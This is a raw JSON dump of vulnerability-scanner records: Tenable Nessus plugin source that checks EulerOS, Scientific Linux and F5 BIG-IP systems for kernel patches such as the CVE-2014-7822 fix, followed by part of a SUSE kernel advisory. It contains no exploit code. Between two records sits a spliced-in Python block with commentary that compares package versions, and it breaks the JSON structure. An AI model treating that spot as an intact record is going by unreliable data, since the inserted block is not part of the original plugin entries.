script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.1.6_42\",\n \"kernel-devel-3.10.0-862.14.1.6_42\",\n \"kernel-headers-3.10.0-862.14.1.6_42\",\n \"kernel-tools-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-devel-3.10.0-862.14.1.6_42\",\n \"perf-3.10.0-862.14.1.6_42\",\n \"python-perf-3.10.0-862.14.1.6_42\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:48:39", "description": " - A flaw was found in the way the Linux kernel's splice()\n system call validated its parameters. On certain file\n systems, a local, unprivileged user could use this flaw\n to write past the maximum file size, and thus crash the\n system. (CVE-2014-7822, Moderate)\n\nThis update also fixes the following bugs :\n\n - Previously, hot-unplugging of a virtio-blk device could\n in some cases lead to a kernel panic, for example during\n in-flight I/O requests. This update fixes race condition\n in the hot-unplug code in the virtio_blk.ko module. As a\n result, hot unplugging of the virtio-blk device no\n longer causes the guest kernel oops when there are\n in-flight I/O requests.\n\n - Before this update, due to a bug in the error-handling\n path, a corrupted metadata block could be used as a\n valid block. With this update, the error handling path\n has been fixed and more checks have been added to verify\n the metadata block. Now, when a corrupted metadata block\n is encountered, it is properly marked as corrupted and\n handled accordingly.\n\n - Previously, an incorrectly initialized variable resulted\n in a random value being stored in the variable that\n holds the number of default ACLs, and is sent in the\n SET_PATH_INFO data structure. Consequently, the setfacl\n command could, under certain circumstances, fail with an\n 'Invalid argument' error. 
With this update, the variable\n is correctly initialized to zero, thus fixing the bug.\n\nThe system must be rebooted for this update to take effect.", "edition": 15, "published": "2015-02-12T00:00:00", "title": "Scientific Linux Security Update : kernel on SL5.x i386/x86_64 (20150210)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822"], "modified": "2015-02-12T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-PAE-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-xen-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:kernel-xen-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-PAE", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:kernel-xen", "p-cpe:/a:fermilab:scientific_linux:kernel-PAE-devel"], "id": "SL_20150210_KERNEL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/81308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81308);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-7822\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL5.x i386/x86_64 (20150210)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The 
remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - A flaw was found in the way the Linux kernel's splice()\n system call validated its parameters. On certain file\n systems, a local, unprivileged user could use this flaw\n to write past the maximum file size, and thus crash the\n system. (CVE-2014-7822, Moderate)\n\nThis update also fixes the following bugs :\n\n - Previously, hot-unplugging of a virtio-blk device could\n in some cases lead to a kernel panic, for example during\n in-flight I/O requests. This update fixes race condition\n in the hot-unplug code in the virtio_blk.ko module. As a\n result, hot unplugging of the virtio-blk device no\n longer causes the guest kernel oops when there are\n in-flight I/O requests.\n\n - Before this update, due to a bug in the error-handling\n path, a corrupted metadata block could be used as a\n valid block. With this update, the error handling path\n has been fixed and more checks have been added to verify\n the metadata block. Now, when a corrupted metadata block\n is encountered, it is properly marked as corrupted and\n handled accordingly.\n\n - Previously, an incorrectly initialized variable resulted\n in a random value being stored in the variable that\n holds the number of default ACLs, and is sent in the\n SET_PATH_INFO data structure. Consequently, the setfacl\n command could, under certain circumstances, fail with an\n 'Invalid argument' error. 
With this update, the variable\n is correctly initialized to zero, thus fixing the bug.\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1502&L=scientific-linux-errata&T=0&P=901\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?173e2366\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-PAE-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"kernel-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-debuginfo-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-debuginfo-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-devel-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debuginfo-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debuginfo-common-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-devel-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-doc-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-headers-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-debuginfo-2.6.18-402.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-devel-2.6.18-402.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-debuginfo / kernel-PAE-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T02:08:16", "description": "The implementation of certain splice_write file operations in the\nLinux kernel before 3.16 does not enforce a restriction on the maximum\nsize of a single file, which allows local users to cause a denial of\nservice (system crash) or possibly have unspecified other impact via a\ncrafted splice system call, as demonstrated by use of a file\ndescriptor associated with an ext4 filesystem.", "edition": 27, "published": "2015-09-09T00:00:00", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (SOL17237)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL17237.NASL", "href": "https://www.tenable.com/plugins/nessus/85854", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL17237.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85854);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2014-7822\");\n script_bugtraq_id(72347);\n\n 
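The Scientific Linux plugin above decides vulnerability with rpm_check() calls that compare every installed build of each kernel package against the reference build kernel-2.6.18-402.el5. The Python below is an added example, not Tenable's code and not part of either plugin on this page: it re-implements that comparison with RPM's own segment-wise rpmvercmp ordering (so 2.6.18-402.el5 sorts after 2.6.18-398.el5, 1.10 after 1.9, and 1.0~rc1 before 1.0), runs it over a constructed `rpm -qa` listing, and adds the check the description's reboot note implies but a package-list scan alone cannot make: `uname -r` is compared against the same reference, because a fixed kernel that is installed but not booted leaves the host exposed. SAMPLE_RPM_QA, SAMPLE_UNAME_R and the function names are this example's own; the reference NVR is the one from the plugin.

```python
# Added example (not Tenable's plugin code). The rpm -qa listing and the uname -r
# value are constructed sample data, not captured from a real host.
import re
import string

# Reference build from the plugin: rpm_check(release:"SL5", reference:"kernel-2.6.18-402.el5")
FIXED_KERNEL = "kernel-2.6.18-402.el5"

# Constructed: rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH}\n' | grep '^kernel'
SAMPLE_RPM_QA = """\
kernel-2.6.18-398.el5.x86_64
kernel-2.6.18-402.el5.x86_64
kernel-devel-2.6.18-398.el5.x86_64
kernel-headers-2.6.18-402.el5.x86_64
"""
# Constructed `uname -r` on the same host: the fixed build is installed but not yet booted
SAMPLE_UNAME_R = "2.6.18-398.el5"

_ALNUM = frozenset(string.ascii_letters + string.digits)
_ARCH_SUFFIX = re.compile(r"\.(x86_64|i[3-6]86|noarch|ppc64|s390x)$")


def rpmvercmp(a: str, b: str) -> int:
    """RPM's label ordering: 1 if a is newer than b, -1 if older, 0 if equal.

    Digit runs compare numerically, letter runs lexically, a digit run beats a letter
    run, separators are ignored, and '~' sorts before anything (1.0~rc1 < 1.0).
    The newer '^' marker is not used by el5 packages and is not handled.
    """
    if a == b:
        return 0
    i = j = 0
    while i < len(a) or j < len(b):
        while i < len(a) and a[i] not in _ALNUM and a[i] != "~":
            i += 1
        while j < len(b) and b[j] not in _ALNUM and b[j] != "~":
            j += 1
        a_tilde = i < len(a) and a[i] == "~"
        b_tilde = j < len(b) and b[j] == "~"
        if a_tilde or b_tilde:
            if not a_tilde:
                return 1
            if not b_tilde:
                return -1
            i, j = i + 1, j + 1
            continue
        if i >= len(a) or j >= len(b):
            break
        numeric = a[i] in string.digits
        pattern = r"[0-9]+" if numeric else r"[A-Za-z]+"
        seg_a = re.match(pattern, a[i:]).group(0)
        m_b = re.match(pattern, b[j:])
        seg_b = m_b.group(0) if m_b else ""
        i, j = i + len(seg_a), j + len(seg_b)
        if not seg_b:
            return 1 if numeric else -1   # the side holding the digit run is newer
        if numeric:
            seg_a, seg_b = seg_a.lstrip("0"), seg_b.lstrip("0")
            if len(seg_a) != len(seg_b):
                return 1 if len(seg_a) > len(seg_b) else -1
        if seg_a != seg_b:
            return 1 if seg_a > seg_b else -1
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1   # whichever side still has segments is newer


def split_nvr(pkg: str):
    """'kernel-2.6.18-398.el5.x86_64' -> ('kernel', '2.6.18', '398.el5'); arch suffix dropped."""
    name, version, release = _ARCH_SUFFIX.sub("", pkg.strip()).rsplit("-", 2)
    return name, version, release


def vr_cmp(v1: str, r1: str, v2: str, r2: str) -> int:
    """Order two builds of one package: version, then release (epochs assumed equal, as on el5 kernels)."""
    c = rpmvercmp(v1, v2)
    return c if c else rpmvercmp(r1, r2)


def outdated_installs(rpm_qa_text: str, reference: str):
    """What rpm_check() flags: each installed build of the referenced package older than the reference.

    Kernel packages are multi-install, so an old build can sit beside the fixed one;
    every older build is reported, which is the conservative reading.
    """
    ref_name, ref_v, ref_r = split_nvr(reference)
    hits = []
    for line in rpm_qa_text.splitlines():
        if not line.strip():
            continue
        name, v, r = split_nvr(line)
        if name == ref_name and vr_cmp(v, r, ref_v, ref_r) < 0:
            hits.append(f"{name}-{v}-{r}")
    return hits


def running_kernel_is_fixed(uname_r: str, reference: str) -> bool:
    """The advisory requires a reboot: the fix is live only once `uname -r` is at least the reference.
    Compare a PAE or xen flavour (e.g. 2.6.18-402.el5PAE) against its own kernel-PAE / kernel-xen reference."""
    _, ref_v, ref_r = split_nvr(reference)
    run_v, run_r = uname_r.strip().split("-", 1)
    return vr_cmp(run_v, run_r, ref_v, ref_r) >= 0


if __name__ == "__main__":
    print("installed but older than the fix:", outdated_installs(SAMPLE_RPM_QA, FIXED_KERNEL))
    print("running kernel carries the fix:", running_kernel_is_fixed(SAMPLE_UNAME_R, FIXED_KERNEL))
```

On the sample data this reports the leftover kernel-2.6.18-398.el5 build and that the running kernel is still the unfixed one, which is the gap a package-list scan misses when it looks only at the newest installed version. The string comparison in rpmvercmp is deliberately not a plain dotted-tuple compare: release strings such as 402.el5 mix digit and letter runs, and a naive split on "." would misorder them.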
script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (SOL17237)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The implementation of certain splice_write file operations in the\nLinux kernel before 3.16 does not enforce a restriction on the maximum\nsize of a single file, which allows local users to cause a denial of\nservice (system crash) or possibly have unspecified other impact via a\ncrafted splice system call, as demonstrated by use of a file\ndescriptor associated with an ext4 filesystem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K17237\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL17237.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL17237\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.6.0\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.6.0\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.6.0\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected 
modules\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:48:25", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4692", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2014-9729", "CVE-2015-3212", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-4036", "CVE-2015-1805"], "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.44 to receive\n various security and bugfixes.\n\n These features were added:\n - mpt2sas: Added Reply Descriptor Post Queue (RDPQ) Array support\n (bsc#854824).\n - mpt3sas: Bump mpt3sas driver version to 04.100.00.00 (bsc#854817).\n\n Following security bugs were fixed:\n - CVE-2015-1805: iov overrun for failed atomic copy could have lead to DoS\n or privilege escalation (bsc#933429).\n - CVE-2015-3212: A race condition in the way the Linux kernel handled\n lists of associations in SCTP sockets could have lead to list corruption\n and kernel panics (bsc#936502).\n - CVE-2015-4036: DoS via memory corruption in vhost/scsi driver\n (bsc#931988).\n - CVE-2015-4167: Linux kernel built with the UDF file\n system(CONFIG_UDF_FS) support was vulnerable to a crash. 
It occurred\n while fetching inode information from a corrupted/malicious udf file\n system image (bsc#933907).\n - CVE-2015-4692: DoS via NULL pointer dereference in kvm_apic_has_events\n function (bsc#935542).\n - CVE-2015-5364: Remote DoS via flood of UDP packets with invalid\n checksums (bsc#936831).\n - CVE-2015-5366: Remote DoS of EPOLLET epoll applications via flood of UDP\n packets with invalid checksums (bsc#936831).\n\n Security issues already fixed in the previous update but not referenced by\n CVE:\n - CVE-2014-9728: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n - CVE-2014-9729: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n - CVE-2014-9730: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to a crash (bsc#933904).\n - CVE-2014-9731: Kernel built with the UDF file system(CONFIG_UDF_FS)\n support were vulnerable to information leakage (bsc#933896).\n\n The following non-security bugs were fixed:\n - ALSA: hda - add codec ID for Skylake display audio codec (bsc#936556).\n - ALSA: hda/hdmi - apply Haswell fix-ups to Skylake display codec\n (bsc#936556).\n - ALSA: hda_controller: Separate stream_tag for input and output streams\n (bsc#936556).\n - ALSA: hda_intel: add AZX_DCAPS_I915_POWERWELL for SKL and BSW\n (bsc#936556).\n - ALSA: hda_intel: apply the Seperate stream_tag for Skylake (bsc#936556).\n - ALSA: hda_intel: apply the Seperate stream_tag for Sunrise Point\n (bsc#936556).\n - Btrfs: Handle unaligned length in extent_same (bsc#937609).\n - Btrfs: add missing inode item update in fallocate() (bsc#938023).\n - Btrfs: check pending chunks when shrinking fs to avoid corruption\n (bsc#936445).\n - Btrfs: do not update mtime/ctime on deduped inodes (bsc#937616).\n - Btrfs: fix block group ->space_info null pointer dereference\n (bsc#935088).\n - Btrfs: fix clone / extent-same deadlocks (bsc#937612).\n - 
